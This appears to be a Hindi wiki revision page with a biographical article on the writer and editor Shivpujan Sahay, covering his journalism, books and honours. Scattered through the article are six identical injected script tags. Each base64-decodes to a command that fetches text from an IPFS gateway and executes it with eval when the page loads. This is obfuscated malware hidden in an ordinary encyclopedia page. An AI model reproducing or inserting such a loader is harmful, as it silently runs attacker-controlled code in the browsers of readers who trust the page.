Difference between revisions of "शिवपूजन सहाय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 36: Line 36:
 
शिवपूजन सहाय की सेवाएँ हिन्दी पत्रकारिता के क्षेत्र में उल्लेखनीय हैं। [[1921]]-22 ई. के आसपास शिवपूजन सहाय ने आरा से निकलने वाले 'मारवाड़ी सुधार' नामक मासिक पत्रिका का सम्पादन किया। शिवपूजन सहाय [[1923]] ई. में [[कलकत्ता]] के 'मतवाला मण्डल' के सदस्य हुए और कुछ समय के लिए 'आदर्श', 'उपन्यास तरंग', तथा 'समन्वय' आदि पत्रों में सम्पादन का कार्य किया। शिवपूजन सहाय ने [[1925]] ई. में कुछ मास के लिए 'माधुरी' के सम्पादकीय विभाग को अपनी सेवाएँ अर्पित कीं। वह [[1930]] ई. में [[सुल्तानगंज]]-[[भागलपुर]] से प्रकाशित होने वाली 'गंगा' नामक मासिक पत्रिका के सम्पादक मण्डल के सदस्य हुए। शिवपूजन सहाय ने एक वर्ष के उपरान्त [[काशी]] में रहकर साहित्यिक पाक्षिक 'जागरण' का सम्पादन किया। शिवपूजन सहाय काशी में कई वर्ष तक रहे। [[1934]] ई. में लहेरियासराय (दरभंगा) जाकर मासिक पत्र 'बालक' का सम्पादन किया। स्वतंत्रता के बाद शिवपूजन सहाय [[बिहार]] राष्ट्रभाषा परिषद के संचालक तथा बिहार हिन्दी साहित्य सम्मेलन की ओर से प्रकाशित 'साहित्य' नामक शोध-समीक्षाप्रधान त्रैमासिक पत्र के सम्पादक थे।
 
शिवपूजन सहाय की सेवाएँ हिन्दी पत्रकारिता के क्षेत्र में उल्लेखनीय हैं। [[1921]]-22 ई. के आसपास शिवपूजन सहाय ने आरा से निकलने वाले 'मारवाड़ी सुधार' नामक मासिक पत्रिका का सम्पादन किया। शिवपूजन सहाय [[1923]] ई. में [[कलकत्ता]] के 'मतवाला मण्डल' के सदस्य हुए और कुछ समय के लिए 'आदर्श', 'उपन्यास तरंग', तथा 'समन्वय' आदि पत्रों में सम्पादन का कार्य किया। शिवपूजन सहाय ने [[1925]] ई. में कुछ मास के लिए 'माधुरी' के सम्पादकीय विभाग को अपनी सेवाएँ अर्पित कीं। वह [[1930]] ई. में [[सुल्तानगंज]]-[[भागलपुर]] से प्रकाशित होने वाली 'गंगा' नामक मासिक पत्रिका के सम्पादक मण्डल के सदस्य हुए। शिवपूजन सहाय ने एक वर्ष के उपरान्त [[काशी]] में रहकर साहित्यिक पाक्षिक 'जागरण' का सम्पादन किया। शिवपूजन सहाय काशी में कई वर्ष तक रहे। [[1934]] ई. में लहेरियासराय (दरभंगा) जाकर मासिक पत्र 'बालक' का सम्पादन किया। स्वतंत्रता के बाद शिवपूजन सहाय [[बिहार]] राष्ट्रभाषा परिषद के संचालक तथा बिहार हिन्दी साहित्य सम्मेलन की ओर से प्रकाशित 'साहित्य' नामक शोध-समीक्षाप्रधान त्रैमासिक पत्र के सम्पादक थे।
 
==लिखी हुई पुस्तकें==
 
==लिखी हुई पुस्तकें==
शिव पूजन सहाय की लिखी हुई पुस्तकें विभिन्न विषयों से सम्बद्ध हैं तथा उनकी विधाएँ भी भिन्न-भिन्न हैं। 'बिहार का बिहार' बिहार प्रान्त का भौगोलिक एवं ऐतिहासिक वर्णन प्रस्तुत करती है। 'विभूति' में कहानियाँ संकलित हैं। 'देहाती दुनियाँ' ([[1926]] ई.) प्रयोगात्मक चरित्र प्रधान औपन्यासिक कृति है। इसकी पहली पाण्डुलिपि [[लखनऊ]] के हिन्दू मुस्लिम दंगे में नष्ट हो गयी थी। इसका शिवपूजन सहाय जी को बहुत दु:ख था। उन्होंने दुबारा वही पुस्तक फिर लिखकर प्रकाशित करायी किन्तु उससे शिवपूजन सहाय को पूरा संतोष नहीं हुआ। शिवपूजन सहाय कहा करते थे कि पहले की लिखी हुई चीज़ कुछ और ही थी। 'ग्राम सुधार' तथा 'अन्नपूर्णा के मन्दिर में' नामक दो पुस्तकें ग्रामोद्धारसम्बन्धी लेखों के संग्रह हैं। इनके अतिरिक्त 'दो पड़ी' एक हास्यरसात्मक कृति है, 'माँ के सपूत' बालोपयोगी तथा 'अर्जुन' और 'भीष्म' नामक दो पुस्तकें [[महाभारत]] के दो पात्रों की जीवनी के रूप में लिखी गयी हैं। शिव पूजन सहाय ने अनेक पुस्तकों का सम्पादन भी किया है, जिनमें 'राजेन्द्र अभिनन्दन ग्रन्थ' विशेष रूप से उल्लेखनीय हैं। '''बिहार राष्ट्रभाषा परिषद ([[पटना]]) ने इनकी विभिन्न रचनाओं को अब तक चार खण्डों में 'शिवपूजन रचनावली' के नाम से प्रकाशित किया है।'''
+
शिव पूजन सहाय की लिखी हुई पुस्तकें विभिन्न विषयों से सम्बद्ध हैं तथा उनकी विधाएँ भी भिन्न-भिन्न हैं। 'बिहार का बिहार' बिहार प्रान्त का भौगोलिक एवं ऐतिहासिक वर्णन प्रस्तुत करती है। 'विभूति' में कहानियाँ संकलित हैं। 'देहाती दुनियाँ' ([[1926]] ई.) प्रयोगात्मक चरित्र प्रधान औपन्यासिक कृति है। इसकी पहली [[पाण्डुलिपि]] [[लखनऊ]] के हिन्दू मुस्लिम दंगे में नष्ट हो गयी थी। इसका शिवपूजन सहाय जी को बहुत दु:ख था। उन्होंने दुबारा वही पुस्तक फिर लिखकर प्रकाशित करायी किन्तु उससे शिवपूजन सहाय को पूरा संतोष नहीं हुआ। शिवपूजन सहाय कहा करते थे कि पहले की लिखी हुई चीज़ कुछ और ही थी। 'ग्राम सुधार' तथा 'अन्नपूर्णा के मन्दिर में' नामक दो पुस्तकें ग्रामोद्धारसम्बन्धी लेखों के संग्रह हैं। इनके अतिरिक्त 'दो पड़ी' एक हास्यरसात्मक कृति है, 'माँ के सपूत' बालोपयोगी तथा 'अर्जुन' और 'भीष्म' नामक दो पुस्तकें [[महाभारत]] के दो पात्रों की जीवनी के रूप में लिखी गयी हैं। शिव पूजन सहाय ने अनेक पुस्तकों का सम्पादन भी किया है, जिनमें 'राजेन्द्र अभिनन्दन ग्रन्थ' विशेष रूप से उल्लेखनीय हैं। '''बिहार राष्ट्रभाषा परिषद ([[पटना]]) ने इनकी विभिन्न रचनाओं को अब तक चार खण्डों में 'शिवपूजन रचनावली' के नाम से प्रकाशित किया है।'''
 +
 
 
==विशिष्ट स्थान==
 
==विशिष्ट स्थान==
 
शिवपूजन सहाय का हिन्दी के गद्य साहित्य में एक विशिष्ट स्थान है। शिवपूजन सहाय की भाषा बड़ी सहज रही है। इन्होंने उर्दू शब्दों का प्रयोग धड़ल्ले से किया है और प्रचलित मुहावरों के सन्तुलित उपयोग द्वारा लोकरुचि का स्पर्श करने की चेष्टा की है। शिवपूजन सहाय ने कहीं-कहीं अनंकरणप्रधान अनुप्रास बहुल भाषा का भी व्यवहार किया है और '''गद्य में पद्य की सी छटा उत्पन्न करने की चेष्टा की है।''' भाषा के इस पद्यात्मक स्वरूप के बावज़ूद शिवपूजन सहाय के गद्य लेखन में गाम्भीर्य का अभाव नहीं है। शिवपूजन सहाय की शैली ओज-गुण सम्पन्न है और यत्र-तत्र उसमें वक्तृत्व कला की विशेषताएँ उपलब्ध होती हैं।{{दाँयाबक्सा|पाठ=भाषा के इस पद्यात्मक स्वरूप के बावज़ूद शिवपूजन सहाय के गद्य लेखन में गाम्भीर्य का अभाव नहीं है। शिवपूजन सहाय की शैली ओज-गुण सम्पन्न है और यत्र-तत्र उसमें वक्तृत्व कला की विशेषताएँ उपलब्ध होती हैं।|विचारक=}}  
 
शिवपूजन सहाय का हिन्दी के गद्य साहित्य में एक विशिष्ट स्थान है। शिवपूजन सहाय की भाषा बड़ी सहज रही है। इन्होंने उर्दू शब्दों का प्रयोग धड़ल्ले से किया है और प्रचलित मुहावरों के सन्तुलित उपयोग द्वारा लोकरुचि का स्पर्श करने की चेष्टा की है। शिवपूजन सहाय ने कहीं-कहीं अनंकरणप्रधान अनुप्रास बहुल भाषा का भी व्यवहार किया है और '''गद्य में पद्य की सी छटा उत्पन्न करने की चेष्टा की है।''' भाषा के इस पद्यात्मक स्वरूप के बावज़ूद शिवपूजन सहाय के गद्य लेखन में गाम्भीर्य का अभाव नहीं है। शिवपूजन सहाय की शैली ओज-गुण सम्पन्न है और यत्र-तत्र उसमें वक्तृत्व कला की विशेषताएँ उपलब्ध होती हैं।{{दाँयाबक्सा|पाठ=भाषा के इस पद्यात्मक स्वरूप के बावज़ूद शिवपूजन सहाय के गद्य लेखन में गाम्भीर्य का अभाव नहीं है। शिवपूजन सहाय की शैली ओज-गुण सम्पन्न है और यत्र-तत्र उसमें वक्तृत्व कला की विशेषताएँ उपलब्ध होती हैं।|विचारक=}}  

Revision as of 11:10, 23 April 2013

shivapoojan sahay
poora nam achary shivapoojan sahay
janm 9 agast, 1893
janm bhoomi gram unavas, bihar
mrityu 21 janavari, 1963
mrityu sthan patana, bihar
karm-kshetr adhyapak, upanyasakar, kahanikar, sampadak
mukhy rachanaean dehati duniyaan, matavala madhuri, ganga, jagaran, himalay, hindi bhasha aur sahity, shivapoojan rachanavali
vishay gady, upanyas, kahani,
puraskar-upadhi padm bhooshan (1960)
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

achary shivapoojan sahay (janm- 9 agast, 1893, mrityu- 21 janavari, 1963) hindi sahity mean ek upanyasakar, kahanikar, sampadak ke rup mean jane jate haian.

janm aur shiksha

shivapoojan sahay ka janm sanh 1893 ee. gram unavas, sab divijan baksar, ­zila shahabad (bihar) mean hua tha. 1912 ee. mean ara nagar ke ek haee skool se shivapoojan sahay ne maitrik ki pariksha uttirn ki. shivapoojan sahay ne samajik jivan ka shubharambh hindi shikshak ke roop mean kiya aur sahity ke kshetr mean patr-patrikaoan ke madhyam se aye. shivapoojan sahay ke arambhik lekh tatha kahaniyaan 'shiksha', 'lakshmi', 'manoranjan' tatha 'pataliputr' adi patrikaoan mean prakashit haian.

sevaean

shivapoojan sahay ki sevaean hindi patrakarita ke kshetr mean ullekhaniy haian. 1921-22 ee. ke asapas shivapoojan sahay ne ara se nikalane vale 'marava di sudhar' namak masik patrika ka sampadan kiya. shivapoojan sahay 1923 ee. mean kalakatta ke 'matavala mandal' ke sadasy hue aur kuchh samay ke lie 'adarsh', 'upanyas tarang', tatha 'samanvay' adi patroan mean sampadan ka kary kiya. shivapoojan sahay ne 1925 ee. mean kuchh mas ke lie 'madhuri' ke sampadakiy vibhag ko apani sevaean arpit kian. vah 1930 ee. mean sultanaganj-bhagalapur se prakashit hone vali 'ganga' namak masik patrika ke sampadak mandal ke sadasy hue. shivapoojan sahay ne ek varsh ke uparant kashi mean rahakar sahityik pakshik 'jagaran' ka sampadan kiya. shivapoojan sahay kashi mean kee varsh tak rahe. 1934 ee. mean laheriyasaray (darabhanga) jakar masik patr 'balak' ka sampadan kiya. svatantrata ke bad shivapoojan sahay bihar rashtrabhasha parishad ke sanchalak tatha bihar hindi sahity sammelan ki or se prakashit 'sahity' namak shodh-samikshapradhan traimasik patr ke sampadak the.

likhi huee pustakean

shiv poojan sahay ki likhi huee pustakean vibhinn vishayoan se sambaddh haian tatha unaki vidhaean bhi bhinn-bhinn haian. 'bihar ka bihar' bihar prant ka bhaugolik evan aitihasik varnan prastut karati hai. 'vibhooti' mean kahaniyaan sankalit haian. 'dehati duniyaan' (1926 ee.) prayogatmak charitr pradhan aupanyasik kriti hai. isaki pahali pandulipi lakhanoo ke hindoo muslim dange mean nasht ho gayi thi. isaka shivapoojan sahay ji ko bahut du:kh tha. unhoanne dubara vahi pustak phir likhakar prakashit karayi kintu usase shivapoojan sahay ko poora santosh nahian hua. shivapoojan sahay kaha karate the ki pahale ki likhi huee chiz kuchh aur hi thi. 'gram sudhar' tatha 'annapoorna ke mandir mean' namak do pustakean gramoddharasambandhi lekhoan ke sangrah haian. inake atirikt 'do p di' ek hasyarasatmak kriti hai, 'maan ke sapoot' balopayogi tatha 'arjun' aur 'bhishm' namak do pustakean mahabharat ke do patroan ki jivani ke roop mean likhi gayi haian. shiv poojan sahay ne anek pustakoan ka sampadan bhi kiya hai, jinamean 'rajendr abhinandan granth' vishesh roop se ullekhaniy haian. bihar rashtrabhasha parishad (patana) ne inaki vibhinn rachanaoan ko ab tak char khandoan mean 'shivapoojan rachanavali' ke nam se prakashit kiya hai.

vishisht sthan

shivapoojan sahay ka hindi ke gady sahity mean ek vishisht sthan hai. shivapoojan sahay ki bhasha b di sahaj rahi hai. inhoanne urdoo shabdoan ka prayog dh dalle se kiya hai aur prachalit muhavaroan ke santulit upayog dvara lokaruchi ka sparsh karane ki cheshta ki hai. shivapoojan sahay ne kahian-kahian anankaranapradhan anupras bahul bhasha ka bhi vyavahar kiya hai aur gady mean pady ki si chhata utpann karane ki cheshta ki hai. bhasha ke is padyatmak svaroop ke bavazood shivapoojan sahay ke gady lekhan mean gambhiry ka abhav nahian hai. shivapoojan sahay ki shaili oj-gun sampann hai aur yatr-tatr usamean vaktritv kala ki visheshataean upalabdh hoti haian.

chitr:Blockquote-open.gif bhasha ke is padyatmak svaroop ke bavazood shivapoojan sahay ke gady lekhan mean gambhiry ka abhav nahian hai. shivapoojan sahay ki shaili oj-gun sampann hai aur yatr-tatr usamean vaktritv kala ki visheshataean upalabdh hoti haian. chitr:Blockquote-close.gif

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

hindi-seva

shivapoojan sahay ka samast jivan hindi-seva ki kahani hai. inhoanne apane jivan ka adhikaansh bhag hindi bhasha ki unnati evan usake prachar-prasar mean vyatit kiya hai. bihar hindi sahity sammelan tatha bihar rashtrabhasha parishad namak hindi ki do prasiddh sansthaean inaki kirti katha ke amooly smarak ke roop mean haian. inake sansmaran mean bihar se 'smriti granth' bhi prakashit hua hai.

rachanaean

dehati duniyaan  (1926),  matavala madhuri (1924), ganga (1931),  jagaran (1932), himalay (1946),  sahity (1950) vahi din vahi log (1965),  mera jivan (1985),  smriti shesh (1994), hindi bhasha aur sahity (1996), 

sahayak granth-shivapoojan rachanavali, (char khandoan mean), bi. ra. bha. parishadh, patana.

samman

shivapoojan sahay ko sahity evan shiksha ke kshetr mean sanh 1960  mean padm bhooshan se sammanit kiya gaya tha.

nidhan

is mahan sahityakar ka nidhan 21 janavari1963 mean patana mean hua .

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>